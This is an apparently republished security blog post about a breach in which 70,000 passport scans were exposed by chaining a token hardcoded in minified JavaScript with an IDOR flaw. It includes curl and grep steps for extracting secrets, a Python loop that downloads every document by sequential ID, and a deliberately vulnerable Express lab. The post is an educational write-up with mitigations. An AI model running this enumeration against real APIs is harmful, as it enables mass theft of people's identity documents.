How 70,000 Passport Scans Were Exposed: The Deadly Chain of JS Minification and IDOR + Video

By /

Listen to this Post

Featured Image

Introduction:

In a recent real‑world incident, a security researcher discovered over 70,000 passport scans exposed through a seemingly secure web application. The breach was not the result of a single critical vulnerability, but a chain of two medium‑severity issues: hardcoded API credentials hidden inside a minified JavaScript bundle, combined with an Insecure Direct Object Reference (IDOR) that allowed unauthorized access to any user’s documents. This case highlights how client‑side code can become a backdoor when secrets are improperly embedded, and how seemingly harmless information leaks can be chained into a massive data breach.

Learning Objectives:

  • Recognize how API keys and secrets can be inadvertently exposed in minified front‑end JavaScript.
  • Learn step‑by‑step techniques to deobfuscate, analyze, and extract hidden credentials from client‑side code.
  • Understand how to identify and exploit IDOR vulnerabilities in APIs by chaining leaked metadata.
  • Implement secure coding practices to prevent hardcoded secrets and enforce proper authorization checks.

You Should Know:

1. The Hidden Danger in Minified JavaScript

Modern web applications often deliver large bundles of minified JavaScript. While minification improves performance, it can also obscure sensitive information that developers accidentally leave in the code. In the case described, the attacker noticed a JavaScript bundle that loaded only under specific session conditions—a subtle indicator that the bundle contained privileged logic.

Step‑by‑step guide to analyze minified JavaScript:

  1. Identify the bundle – Use browser developer tools (F12) → Network tab, filter by “JS”. Look for scripts loaded conditionally (e.g., only after a specific redirect or query parameter).
  2. Retrieve the file – Copy the URL and download it locally: 
    curl -O https://target.com/js/unique-bundle.js
  3. Prettify the code – Use tools like `js-beautify` or online formatters: 
    npm install -g js-beautify
js-beautify unique-bundle.js > beautified.js
  4. Search for patterns – Grep for common keywords like apiKey, secret, token, Authorization, Bearer, const, `let` with suspicious values: 
    grep -E "(api[_-]?key|secret|token|Authorization)" beautified.js
  5. Manual review – Look for functions that concatenate strings, as seen in the incident where three constants scattered in the code were pieced together to form a valid API header. Example vulnerable pattern: 
    const part1 = "a1b2c3";
const part2 = "d4e5f6";
const part3 = "g7h8i9";
const authHeader = "Bearer " + part1 + part2 + part3;

2. Extracting API Credentials from Client‑Side Code

Once a suspicious string is found, validate if it’s indeed a working credential. Attackers often copy the constructed header and test it against the API endpoints discovered earlier during reconnaissance.

Step‑by‑step extraction and validation:

  1. Reconstruct the credential – In the beautified code, locate the exact concatenation logic. Use the browser console to run the snippet and output the final value.
  2. Identify API endpoints – Review network traffic while interacting with the application to capture API calls. Look for requests made after authentication that might use this credential.
  3. Test the credential – Using `curl` or Postman, send a request to a known endpoint: 
    curl -H "Authorization: Bearer YOUR_EXTRACTED_TOKEN" https://api.target.com/v1/user/profile
  4. Automate with Burp Suite – Configure Burp to intercept requests, then use the “Match and Replace” rule to automatically add the extracted header for all requests, helping you explore the API’s attack surface.

  5. Chaining with IDOR: From Credentials to Data Breach

In the original incident, the API credentials alone were not enough because document references used unpredictable UUIDs. However, a search endpoint revealed internal numeric IDs in its metadata—a classic IDOR vector. By chaining the leaked IDs, the attacker could fetch any document without ownership verification.

Step‑by‑step IDOR exploitation chain:

  1. Map the API – With valid credentials, enumerate all endpoints. Use tools like `ffuf` or Burp Intruder to fuzz common paths (/api/v1/documents, /api/v1/users, /api/v1/search).
  2. Analyze responses – Look for fields that shouldn’t be exposed, such as internal_id, owner_id, or `document_id` that differ from the public UUID.
  3. Extract the seed – In the described case, the search endpoint returned a list of results with a hidden metadata field containing an internal numeric ID.
  4. Test IDOR – Use that ID to access the document endpoint directly: 
    curl -H "Authorization: Bearer TOKEN" "https://api.target.com/v1/documents/INTERNAL_ID"
  5. Automate enumeration – Once a pattern is confirmed (e.g., sequential IDs), write a Python script to iterate and download all documents: 
    import requests
headers = {"Authorization": "Bearer TOKEN"}
for i in range(1, 100000):
r = requests.get(f"https://api.target.com/v1/documents/{i}", headers=headers)
if r.status_code == 200:
print(f"Found document {i}")
with open(f"{i}.pdf", "wb") as f:
f.write(r.content)

4. Mitigation: Preventing Hardcoded Credentials and IDOR

To avoid similar breaches, development teams must adopt secure coding practices that treat client‑side code as untrusted.

Never store secrets client‑side – API keys, tokens, or any sensitive credentials should reside only on the server. If an API must be called from the frontend, use a backend proxy or implement OAuth flows with short‑lived, scope‑limited tokens.

Enforce authorization on every request – Server‑side checks must ensure that the authenticated user is permitted to access the requested resource. Never rely on client‑side hiding of IDs. Use randomly generated UUIDs for resources, but still validate ownership.

Step‑by‑step hardening guide:

  1. Remove secrets from frontend – Scan your codebase with tools like `truffleHog` or `git-secrets` to detect accidental commits of secrets. 
    trufflehog filesystem --directory=./src
  2. Implement proper CORS and CSRF protections – Limit which origins can call your API and enforce anti‑CSRF tokens for state‑changing operations.
  3. Use API gateways – Route all frontend API calls through a gateway that injects the necessary authentication headers, keeping secrets off the client.
  4. Perform IDOR testing – During development, use automated scanners (e.g., OWASP ZAP, Burp Scanner) to test for missing authorization checks. Include negative test cases in your CI/CD pipeline.

5. Practical Lab: Simulating the Attack

To fully understand the chain, set up a minimal vulnerable environment and practice both discovery and exploitation.

Lab setup (Linux/macOS with Node.js):

  1. Create a simple Express server with a vulnerable API: 
    const express = require('express');
const app = express();
const validToken = "a1b2c3d4e5f6"; // hardcoded secret
// Mock document store
const documents = {
1: { owner: "user1", content: "Passport scan 1" },
2: { owner: "user2", content: "Passport scan 2" }
};
app.get('/api/docs/:id', (req, res) => {
const token = req.headers.authorization;
if (token !== <code>Bearer ${validToken}</code>) return res.status(401).send();
const doc = documents[req.params.id];
if (!doc) return res.status(404).send();
// Missing ownership check!
res.json(doc);
});
app.listen(3000);
  2. In a separate file, embed the token in a minified script served to clients: 
    const part1 = "a1b2c3";
const part2 = "d4e5f6";
const apiKey = part1 + part2;

Minify it with `terser` and serve it.

  1. Follow the deobfuscation steps, extract the token, then call /api/docs/1, /api/docs/2, etc. to see how IDOR allows access to all documents.

Fix: Remove the hardcoded token; implement session‑based authentication and add if (doc.owner !== req.session.userId) return 403.

6. Lessons from the Real‑World Breach

The original researcher spent weeks on reconnaissance, not because the vulnerabilities were complex, but because they were hidden in plain sight. The key takeaways from this incident:

  • Surface‑level testing is insufficient – Dynamic scanners often miss client‑side secrets and logical flaws like IDOR. Manual code review and behavioral analysis are essential.
  • Chaining elevates impact – Two “medium” vulnerabilities combined can lead to critical data exposure. Bug bounty programs should reward such chains appropriately.
  • Minification is not security – Developers sometimes mistakenly believe that minification or obfuscation protects secrets. It does not; it only delays discovery.

What Undercode Say:

  • Key Takeaway 1: Hardcoded credentials in JavaScript bundles are a pervasive problem. Even when split across constants, they can be reconstructed with minimal effort using developer tools.
  • Key Takeaway 2: IDOR vulnerabilities remain one of the most common and dangerous API flaws. They often go undetected because they require context—like knowing an internal ID—that attackers can obtain from other endpoints.
  • Analysis: This incident demonstrates the importance of treating the frontend as a public asset. Any data or logic placed client‑side must be considered exposed. Moreover, it underscores that proper access control is not just about hiding IDs; it’s about verifying ownership on every server‑side request. The combination of leaked credentials and missing authorization checks created a perfect storm. Organizations should adopt a defense‑in‑depth strategy that includes static analysis for secrets, regular penetration testing, and strict API authorization models.

Prediction:

As more applications move logic to the client for performance and interactivity, the attack surface for client‑side secrets will expand. We can expect an increase in breaches originating from poorly secured JavaScript bundles, prompting a shift toward server‑side rendering of sensitive components and the wider adoption of Backend‑for‑Frontend (BFF) patterns that keep secrets out of the browser. Additionally, regulatory bodies may begin to mandate stricter controls on how APIs handle personally identifiable information (PII), making IDOR a compliance as well as a security concern. Tools that automatically detect and block IDOR attacks at runtime will become more prevalent, as will automated secret‑scanning in CI/CD pipelines.

▶️ Related Video (80% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Xavi Marquez – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: